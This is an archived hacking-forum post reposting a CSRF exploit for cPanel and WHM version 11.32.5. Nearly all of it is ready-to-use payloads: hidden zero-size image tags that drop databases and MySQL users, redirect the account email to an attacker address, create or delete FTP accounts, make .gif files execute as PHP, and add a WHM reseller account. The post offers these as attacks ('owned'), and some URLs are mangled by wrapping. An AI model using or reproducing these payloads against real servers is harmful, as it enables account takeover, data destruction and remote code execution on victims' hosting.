+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Website & Server Hacking (https://sinister.ly/Forum-Website-Server-Hacking)
+--- Thread: cPanel 11.32.5 -11.32.5.11 [ cPanel Pro ] CSRF Vulnerability (/Thread-cPanel-11-32-5-11-32-5-11-cPanel-Pro-CSRF-Vulnerability)
cPanel 11.32.5 -11.32.5.11 [ cPanel Pro ] CSRF Vulnerability - Timon - 12-04-2012
Panel 11.32.5 -11.32.5.11 [ cPanel Pro ] CSRF Vulnerability
================================================== ============================
Vulnerable Software: cPanel version : 11.32.5 (build 11)-11.32.5.11 [ cPanel Pro ]
Vulnerability: CSRF
Vendor: cpanel.net
================================================== ============================
================================================== ===================
Tested version: Your current cPanel version : 11.32.5 (build 11)-11.32.5.11 [ cPanel Pro ]
Aka: Cpanel Accelerated 2
via
WHM 11.32.5 (build 11)
================================================== ===================
CSRF: Drop Database: (Method $_GET)
<img src="http://***********.net:2082/frontend/x3/sql/deldb.html?db=armenian_music" heigth="0" width="0" />
Here we are going to drop database named: armenian_music
================================================== ===================
CSRF: Drop mysql user: (Method $_GET)
<img src="http://************.net:2082/frontend/x3/sql/deluser.html?user=armenian_adserve" heigth="0" width="0" />
Here we are going to drop mysql user named: armenian_adserver ))
================================================== ===================
CSRF: Change email address: (Contact Information & Preferences) (Method $_GET)
Changing email address to: owned_and_owned_again@gmail.tld
<img src="http://***********.net:2082/frontend/x3/contact/saveemail.html?email=owned_and_owned_again%40gmail .tld&second_email=¬ify_disk_limit=1¬ify_band width_limit=1¬ify_email_quota_limit=1" heigth="0" width="0" />
================================================== ===================
CSRF adding FTP account:
username: akastep
password: akastep
host is target host.
<img src="http://***********.net:2082/json-api/cpanel?cpanel_jsonapi_version=2&cpanel_jsonapi_mod ule=Ftp&cpanel_jsonapi_func=addftp&user=akastep&pa ss=akastep&homedir=/"a=0&cache_fix=owned_by_akastep" heigth="0" width="0" />
================================================== ===================
CSRF Drop FTP account:
Deletes existent ftp account named: axaxa
<img src="http://************.net:2082/json-api/cpanel?cpanel_jsonapi_version=2&cpanel_jsonapi_mod ule=Ftp&cpanel_jsonapi_func=delftp&user=axaxa&cach e_fix=OWNED" heigth="0" width="0" />
================================================== ===================
CSRF change Apache handler:
(Parse .gif file as php script)
<img src="http://***********.net:2082/frontend/x3/mime/addhandle.html?handle=application/x-httpd-php&ext=.gif&submit=Add" heigth="0" width="0" />
================================================== ===================
CSRF Delete handler:
<img src="http://***********.net:2082/frontend/x3/mime/delhandle.html?userhandle=.php" heigth="0" width="0" />
================================================== ===================
WHM 11.32.5 (build 11)
CSRF: Add Reseller+setup
with domain: owned.com
username: owned111
password: MYVERYSTRONGGOESHERE
And contact email: owned@owned1.you
<img src="http://***********.net:2086/scripts5/wwwacct?sign=&plan=Reseller+setup&domain=owned.com &username=owned111&password=MYVERYSTRONGGOESHERE&c ontactemail=owned%40owned1.you&dbuser=owned&msel=n %2Cy%2C1%2Cn%2Cx3%2C1%2C1%2C1%2C1%2C1%2C1000%2Cn%2 C0%2C0%2Cdefault%2Ce n%2C%2C%2CReseller+setup&pkgname=&featurelist=defa ult"a=1&bwlimit=1000&maxftp=1&maxpop=1&maxlst= 1&maxsql=1&maxsub=1&maxpark=0&maxaddon=0&cgi=1&cpm od=x3&language=en&hasuseregns=1&dkim=1&mxcheck=loc al" heigth="0" width="0" />
================================================== ===================
SOURCE : COLLECTED FROM WEB.
Regards
NEO HAXOR INDIA